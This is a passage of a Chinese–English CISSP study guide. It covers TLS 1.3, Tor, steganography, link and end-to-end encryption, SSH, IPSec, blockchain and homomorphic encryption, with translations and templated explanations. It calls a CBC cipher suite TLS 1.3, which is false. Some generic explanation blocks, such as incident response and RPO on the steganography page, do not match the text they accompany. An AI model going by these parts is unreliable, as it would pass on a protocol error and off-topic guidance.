TLS 1.3 cipher suites are usually expressed in long strings that combine both of these elements. For example, the cipher suite: TLS AES_256_CBC_SHA384 means that the server supports TLS using AES CBC mode with a 256-bit key for bulk encryption. Hashing will take place using the SHA-384 algorithm. TLS 1.3 uses variants of the Diffie-Hellman key exchange algorithm. The systems participating in TLS 1.3 communication automatically determine the version of Diffie-Hellman to use and, therefore, the key exchange algorithm is not included in the cipher suite negotiation, as it was in earlier versions of TLS.

Tor and the Dark Web Tor, formerly known as The Onion Router, provides a mechanism for anonymously routing traffic across the Internet using encryption and a set of relay nodes. It relies on a technology known as perfect forward secrecy (PFS), where layers of encryption prevent nodes in the relay chain from reading anything other than the specific information they need to accept and forward the traffic. By using perfect forward secrecy in combination with a set of three or more relay nodes, Tor allows for both anonymous browsing of the standard Internet, as well as the hosting of completely anonymous sites on the dark web.

Steganography and Watermarking Steganography is the art of using cryptographic techniques to embed secret messages within another message. Steganographic algorithms work by making alterations to the least significant bits of the many bits that make up image files. The changes are so minor that there is no appreciable effect on the viewed image. This technique allows communicating parties to conceal messages in plain sight—for example, they might embed a secret message within an illustration on an otherwise innocent web page. TLS 1.3

中文直译 / 整理

密钥套件通常以结合了这两个元素的长字符串表示。 例如,密钥套件: TLS AES 256 CBC SHA384_ _ _ 这意味着服务器支持使用256位密钥的AES CBC模式进行批量加密。 哈希将使用 SHA‑384算法进行。 TLS 1.3 使用 Diffie‑Hellman 密钥交换算法的变体。 参与 TLS 1.3 通信的系统会自动确定要使用的 Diffie‑Hellman 版本,因此密钥交换算 法不再包含在密码套件协商中,而这是早期 TLS 版本中的做法。 Tor 和暗网 Tor,原名为 The Onion Router,通过加密和一组中继节点提供匿名路由互联 网流量的机制。 它依赖于一种称为 完美前向保密(PFS) 的技术,该技术通过 多层加密防止中继链中的节点读取除其所需接受和转发流量的特定信息之外的 任何内容。 通过将完美前向保密与三个或更多中继节点结合使用,Tor 既允许 对标准互联网进行匿名浏览,也允许在暗网上托管完全匿名的网站。 隐写术与数字水印 隐写术是一种利用加密技术将秘密信息嵌入另一条信息中的艺术。 隐写算法通 过修改构成图像文件的众多比特中最低有效位来工作。

这些更改如此微小,以 至于对所查看的图像几乎没有明显影响。 这种技术允许通信双方在明面上隐藏 信息——例如,他们可以将秘密信息嵌入到一个看似无害的网页上的插图中。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 39 / PDF P465

第 465 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

It is also possible to embed messages inside larger excerpts of text. This approach is known as a concealment cipher. Steganographers often embed their secret messages within images or WAV files because these files are often so large that the secret message would easily be missed by even the most observant inspector. Steganography techniques are often used for illegal activities, such as espionage and child pornography. Steganography can also be used for legitimate purposes, however. Adding digital watermarks to documents to protect intellectual property is accomplished by means of steganography. The hidden information is known only to the file's creator.

If someone later creates an unauthorized copy of the content, the watermark can be used to detect the copy and (if uniquely watermarked files are provided to each original recipient) trace the offending copy back to the source. Steganography commonly works by modifying the least significant bit (LSB) of a pixel value in its binary representation. For example, in the RGB color model, each pixel is described by using three decimal numbers, each ranging from 0 to 255. The first number represents the degree of red color in a pixel, the second represents green, and the third represents blue.

If a pixel has the blue value of 64 (binary value of 1000000), changing the LSB to 1 would result in the binary value of 1000001 or the decimal equivalent of 65. This is an imperceptible change but does allow the encoding of a bit of steganographic data. Steganography is an extremely simple technology to use, with free tools openly available on the Internet. Figure 7.2 shows the entire interface of one such tool, iSteg. It simply requires that you specify a text file containing your secret message and an image file that you wish to use to hide the message.

Figure 7.3 shows an example of a picture with an embedded secret message; the message is impossible to detect with the human eye because the text file was added into the message by modifying only the least significant bits of the file. Those do not survive the printing process, and in fact, even if you

中文直译 / 整理

也可以将消息嵌入到更大的段落中 文本。 这 这种做法被称为隐写密码。 隐写术专家通常将秘密信息嵌入图像或WAV文件中,因为这些文件通常非 常大,即使是最细心的检查员也容易忽略其中的秘密信息。 隐写术技术常被 用于非法活动,如间谍活动和儿童色情。 然而,隐写术也可用于合法目的。 通过隐写术在文档中添加数字水印以保护知 识产权是一种常见做法。 隐藏的信息仅文件创建者知晓。 如果有人后来未经授 权复制了内容,水印可用于检测复制行为(如果为每位原始接收者提供了唯一 水印的文件),并追溯到非法复制的来源。 隐写术通常通过修改像素值二进制表示中的最低有效位(LSB)来实现。 例如,在RGB颜色模型中,每个像素由三个十进制数字描述,每个数字范 围为0到255。 第一个数字表示像素中红色的强度,第二个表示绿色,第三 个表示蓝色。 如果一个像素的蓝色值为64(二进制值为1000000),将最 低有效位改为1,则二进制值变为1000001,对应的十进制值为65。 这是一 种难以察觉的改变,但允许编码一个隐写数据位。 隐写术是一种极其简单的技术,互联网上可免费获得公开工具。 图7.2展示了 此类工具iSteg的完整界面。

它只需您指定一个包含秘密信息的文本文件和一个 您希望用来隐藏该信息的图像文件。 图7.3展示了一张嵌入了秘密信息的图片; 由于该文本文件是通过仅修改文件的最低有效位添加到图像中的,因此人类肉 眼无法察觉该信息。 这些位在打印过程中无法保留,事实上,即使您

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 465 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 40 / PDF P466

第 466 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

examined the original full-color, high-resolution digital images, you would not be able to detect the difference. FIGURE 7.2 Steganography tool

中文直译 / 整理

检查原始的全彩高分辨率数字图像,也无法察觉其中的差异。 图7.2 隐写工具

小白解释

场景先行:你是公司的安全负责人,正在读第 466 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 466 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 41 / PDF P467

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

FIGURE 7.3 Image with embedded message Networking The final application of cryptography we'll explore in this chapter is the use of cryptographic algorithms to provide secure networking services. In the following sections, we'll take a brief look at methods used to secure communications circuits. Circuit Encryption Security administrators use two types of encryption techniques to protect data traveling over networks: Link encryption protects entire communications circuits by creating a secure tunnel between two points using either a hardware solution or a software solution that encrypts all traffic entering one end of the tunnel and decrypts all traffic leaving the other end of the tunnel.

For example, a

中文直译 / 整理

图 7.3包含嵌入消息的图像 Netw orking 本章我们将要探讨的密码学的最终应用是使用密码算法提供安全的网络服务。 在以下小节中,我们将简要介绍用于保护通信电路的方法。 电路加密 安全管理员使用两种加密技术来保护在网络上传输的数据: 链路加密通过在两个点之间创建一个安全隧道来保护整个通信电路,该隧 道使用硬件解决方案或软件解决方案对进入隧道一端的所有流量进行加密, 并对离开隧道另一端的所有流量进行解密。 例如,一个

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 42 / PDF P468

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

company with two offices connected via a data circuit might use link encryption to protect against attackers monitoring at a point in between the two offices. End-to-end encryption protects communications between two parties (for example, a client and a server) and is performed independently of link encryption. An example of end-to-end encryption would be the use of TLS to protect communications between a user and a web server. The critical difference between link and end-to-end encryption is that in link encryption, all the data, including the header, trailer, address, and routing data, is also encrypted.

Therefore, each packet has to be decrypted at each hop so that it can be properly routed to the next hop and then reencrypted before it can be sent along its way, which slows the routing. End-to-end encryption does not encrypt the header, trailer, address, and routing data, so it moves faster from point to point but is more susceptible to sniffers and eavesdroppers. When encryption happens at the higher OSI layers, it is usually end-to-end encryption, and if encryption is done at the lower layers of the OSI model, it is usually link encryption. Secure Shell (SSH) is a good example of an end-to-end encryption technique.

This suite of programs provides encrypted alternatives to common Internet applications such as the File Transfer Protocol (FTP), Telnet, and rlogin. There are two versions of SSH. SSH-1 is now considered insecure. SSH-2 drops support for some insecure algorithms and adds several security enhancements, including support for the Diffie–Hellman key exchange protocol and the ability to run multiple sessions over a single SSH connection (channel multiplexing). SSH-2 adds support for secure file transfer (SFTP). SSH-2 provides added protection against on-path attacks, eavesdropping, and IP/DNS spoofing.

IPSec Various security architectures are in use today, each one designed to address security issues in different environments. One such architecture that supports secure communications is the Internet Protocol Security (IPSec) standard. IPSec is a standard architecture set forth by the Internet Engineering Task Force (IETF) for setting up a secure channel to exchange information between two entities.

中文直译 / 整理

公司如果有两个通过数据电路连接的办公室,可以使用链路加密来防止攻 击者在两个办公室之间的某个点进行监控。 端到端加密保护两方之间的通信(例如客户端和服务器),并且独立于 链路加密进行。 端到端加密的一个示例是使用TLS保护用户与Web服务 器之间的通信。 链路加密与端到端加密的关键区别在于,链路加密会加密所有数据,包括头部、 尾部、地址和路由信息。 因此,每个数据包在每一跳都必须解密,以便正确路 由到下一跳,然后在发送前重新加密,这会减慢路由速度。 而端到端加密不会 加密头部、尾部、地址和路由信息,因此数据在点与点之间传输更快,但更容 易受到嗅探器和窃听者的攻击。 当加密发生在较高的OSI层时,通常是端到端加密; 而如果加密在OSI模型的 较低层进行,则通常是链路加密。 安全外壳(SSH)是端到端加密技术的一个良好示例。 这套程序提供了对常见 互联网应用程序(如文件传输协议(FTP)、Telnet 和 rlogin)的加密替代方 案。 SSH 有两个版本。 SSH‑1 现已被认为不安全。

SSH‑2 停止支持某些不安全 的算法,并增加了多项安全增强功能,包括对 Diffie–Hellman 密钥交换协议 的支持以及在单个 SSH 连接上运行多个会话的能力(通道复用)。 SSH‑2 增加 了对安全文件传输(SFTP)的支持。 SSH‑2 提供了针对中间人攻击、窃听以及 IP/DNS 欺骗的额外保护。 IPSec 当今使用着多种安全架构,每种架构都旨在应对不同环境中的安全问题。 其中 一种支持安全通信的架构是互联网协议安全(IPSec)标准。 IPSec是由互联 网工程任务组(IETF)制定的一套标准架构,用于在两个实体之间建立安全 通道以交换信息。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 43 / PDF P469

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

The IP Security (IPSec) protocol provides a complete infrastructure for secured network communications. IPSec has gained widespread acceptance and is now offered in several commercial operating systems out of the box. IPSec relies on security associations, and there are two main components: The Authentication Header (AH) provides assurances of message integrity. AH also provides authentication and access control and prevents replay attacks. The Encapsulating Security Payload (ESP) provides confidentiality and integrity of packet contents. It provides encryption and limited authentication and prevents replay attacks.

ESP also provides some limited authentication, but not to the degree of the AH. Though ESP is sometimes used without AH, it's rare to see AH used without ESP. IPSec provides for two discrete modes of operation. When IPSec is used in transport mode for end-to-end encryption, only the packet payload is encrypted. This mode is designed for peer-to-peer communication. When it's used in tunnel mode, the entire packet, including the header, is encrypted. This mode is designed for link encryption. At runtime, you set up an IPSec session by creating a security association (SA). The SA represents the communication session and records any configuration and status information about the connection.

The SA represents a simplex connection. If you want a two-way channel, you need two SAs, one for each direction. Also, if you want to support a bidirectional channel using both AH and ESP, you will need to set up four SAs. Some of IPSec's greatest strengths come from being able to filter or manage communications on a per-SA basis so that clients or gateways between which security associations exist can be rigorously managed in terms of what kinds of protocols or services can use an IPSec connection. Also, without a valid security association defined, pairs of users or gateways cannot establish IPSec links.

Further details of the IPSec algorithm are provided in Chapter 11, “Secure Network Architecture and Components.”

中文直译 / 整理

互联网协议安全(IPSec)协议为安全的网络通信提供了完整的基础设施。 IPSec已获得广泛接受,如今已作为默认功能集成在多个商业操作系统中。 IPSec依赖于安全关联,其主要包括两个组件: 认证头(AH)提供消息完整性保障。 AH还提供身份验证和访问 控制,并防止重放攻击。 封装安全有效载荷(ESP)提供数据包内容的机密性和完整性。 它提供 加密和有限的身份验证,并防止重放攻击。 ESP还提供一些有限的身份验证,但不如AH全面。 虽然ESP有时在不 使用AH的情况下使用,但几乎看不到仅使用AH而不使用ESP的情况。 IPSec提供两种独立的操作模式。 当IPSec以传输模式用于端到端加密时,仅 加密数据包有效载荷。 此模式适用于点对点通信。 当其以隧道模式使用时,整 个数据包(包括头部)都会被加密。 此模式适用于链路加密。 在运行时,您通过创建安全关联(SA)来建立IPSec会话。 SA代表通信会话, 并记录有关连接的任何配置和状态信息。 SA表示单向连接。 如果您需要双向 通道,则需要两个SA,每个方向一个。 此外,如果您希望同时使用AH和 ESP支持双向通道,则需要设置四个SA。

IPSec 最大的优势之一在于能够基于每个安全关联(SA)过滤或管理通信,从 而使存在安全关联的客户端或网关能够严格控制哪些协议或服务可以使用 IPSec 连接。 此外,如果没有定义有效的安全关联,用户或网关对之间无法建 立 IPSec 链接。 IPSec算法的更多详细信息见第11章,“安全网络架构与组件。 ”

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
学习单元 44 / PDF P470

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Emerging Applications Cryptography plays a central role in many emerging areas of cybersecurity and technology. Let's look at a few of these concepts: the blockchain, lightweight cryptography, and homomorphic encryption. Blockchain The blockchain is, in its simplest description, a distributed and immutable public ledger. This means that it can store records in a way that distributes those records among many different systems located around the world and do so in a manner that prevents anyone from tampering with those records. The blockchain creates a data store that nobody can tamper with or destroy. The first major application of the blockchain is cryptocurrency.

The blockchain was originally invented as a foundational technology for Bitcoin, allowing the tracking of Bitcoin transactions without the use of a centralized authority. In this manner, the blockchain allows the existence of a currency that has no central regulator. Authority for Bitcoin transactions is distributed among all participants in the Bitcoin blockchain. Although cryptocurrency is the blockchain application that has received the most attention, there are many other uses for a distributed immutable ledger —so much so that new applications of blockchain technology seem to be appearing every day.

For example, property ownership records could benefit tremendously from a blockchain application. This approach would place those records in a transparent, public repository that is protected against intentional or accidental damage. Blockchain technology might also be used to track supply chains, providing grocery consumers, for example, with confidence that their produce came from reputable sources and allowing regulators to easily track down the origin of recalled produce. Lightweight Cryptography There are many specialized use cases for cryptography that you may encounter during your career where computing power and energy might be limited.

Some devices operate at extremely low power levels and put a premium on conserving energy. For example, imagine sending a satellite into space with a limited power source. Thousands of hours of engineering go into getting as much life as possible out of that power source. Similar cases happen here on

中文直译 / 整理

新兴应用 密码学在许多新兴的网络安全和技术领域中发挥着核心作用。 让我们来看看 其中的一些概念:区块链、轻量级密码学和同态加密。 区块链 从最简单的描述来看,区块链是一种分布式且不可篡改的公共账本。 这意味着 它可以以一种将记录分布到全球众多不同系统的方式存储数据,并确保任何人 无法篡改这些记录。 区块链创建了一个无人能够篡改或破坏的数据存储系统。 区块链的第一个主要应用是加密货币。 区块链最初是作为比特币的底层技术而 发明的,使人们能够在不使用中心化权威机构的情况下追踪比特币交易。 通过 这种方式,区块链使得一种没有中央监管机构的货币成为可能。 比特币交易的 权威性分布于比特币区块链的所有参与者之中。 尽管加密货币是区块链应用中受到最多关注的领域,但分布式不可篡改账本还 有许多其他用途——以至于区块链技术的新应用似乎每天都在涌现。 例如,产权 记录可以从区块链应用中获益良多。 这种方法将这些记录置于一个透明的公共 存储库中,该存储库可防止故意或意外的损坏。 区块链技术也可能用于追踪供 应链,例如让超市消费者确信其农产品来自信誉良好的来源,并使监管机构能 够轻松追踪被召回农产品的源头。

轻量级密码学 在您的职业生涯中,您可能会遇到许多专门的密码学应用场景,这些场景下 的计算能力和能源可能有限。 某些设备以极低的功耗运行,并高度重视节能。 例如,想象一下将一颗卫星送 入太空,其电源有限。 为了最大限度地延长该电源的使用寿命,投入了数千小 时的工程工作。 类似的情况也发生在

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 45 / PDF P471

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Earth, where remote sensors must transmit information using solar power, a small battery, or other equipment. Smartcards are another example of a low-power environment. They must be able to securely communicate with smartcard readers but only using the energy either stored on the card or transferred to it by a magnetic field. In these cases, cryptographers often design specialized hardware that is purpose-built to implement lightweight cryptographic algorithms with as little power expenditure as possible. You won't need to know the details of how these algorithms work, but you should be familiar with the concept that specialized hardware can minimize power consumption.

Another specialized use for cryptography is in cases where you need very low latency. That simply means that the encryption and decryption should not take a long time. Encrypting network links is a common example where lowlatency cryptography is desirable. The data is moving quickly across a network, and the encryption should be done as quickly as possible to avoid becoming a bottleneck. Specialized encryption hardware also fulfills many low-latency requirements. For example, a dedicated VPN hardware device may contain cryptographic hardware that implements encryption and decryption operations in highly efficient form to maximize speed.

High resiliency requirements exist when it is extremely important that data be preserved and not accidentally destroyed during an encryption operation. In cases where resiliency is extremely important, the easiest way to address the issue is for the sender of data to retain a copy until the recipient confirms the successful receipt and decryption of the data. Homomorphic Encryption Privacy concerns also introduce some specialized use cases for encryption. In particular, we sometimes have applications where we want to protect the privacy of individuals but still want to perform calculations on their data.

Homomorphic encryption technology allows this, encrypting data in a way that preserves the ability to perform computation on that data. When you encrypt data with a homomorphic algorithm and then perform computation on that data, you get a result that, when decrypted, matches the result you would have received if you had performed the computation on the plaintext data in the first place.

中文直译 / 整理

地球上,远程传感器必须使用太阳能、小型电池或其他设备传输信息。 智能卡是低功耗环境的另一个例子。 它们必须能够与智能卡读卡器安全通信, 但只能使用卡上存储的能量或通过磁场传输到卡上的能量。 在这些情况下,密码学家通常会设计专门的硬件,以尽可能低的功耗实现轻量 级加密算法。 您无需了解这些算法的工作细节,但应熟悉专门硬件可以最小化 功耗这一概念。 密码学的另一种专门用途是在需要极低延迟的情况下。 这仅仅意味着加密和解 密过程不应耗时过长。 加密网络链路是低延迟密码学的理想应用示例。 数据在 网络中快速传输,加密应尽可能快速完成,以避免成为瓶颈。 专用加密硬件也满足许多低延迟需求。 例如,专用的VPN硬件设备可能包含以 高效形式实现加密和解密操作的密码学硬件,以最大化速度。 当在加密操作期间必须极其重要地保留数据且避免意外销毁时,存在高弹性要 求。 在弹性至关重要的情况下,解决此问题的最简单方法是数据发送方保留一 份副本,直到接收方确认成功接收并解密数据。 同态加密 隐私问题也引入了一些加密的特殊用例。 特别是,我们有时会遇到这样的应用 场景:希望保护个人的隐私,同时仍能对其数据执行计算。

同态加密技术允许 这样做,它以一种保留数据计算能力的方式对数据进行加密。 当你使用同态算 法加密数据,然后对该数据执行计算时,得到的结果在解密后,将与你最初直 接在明文数据上执行计算所得到的结果一致。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
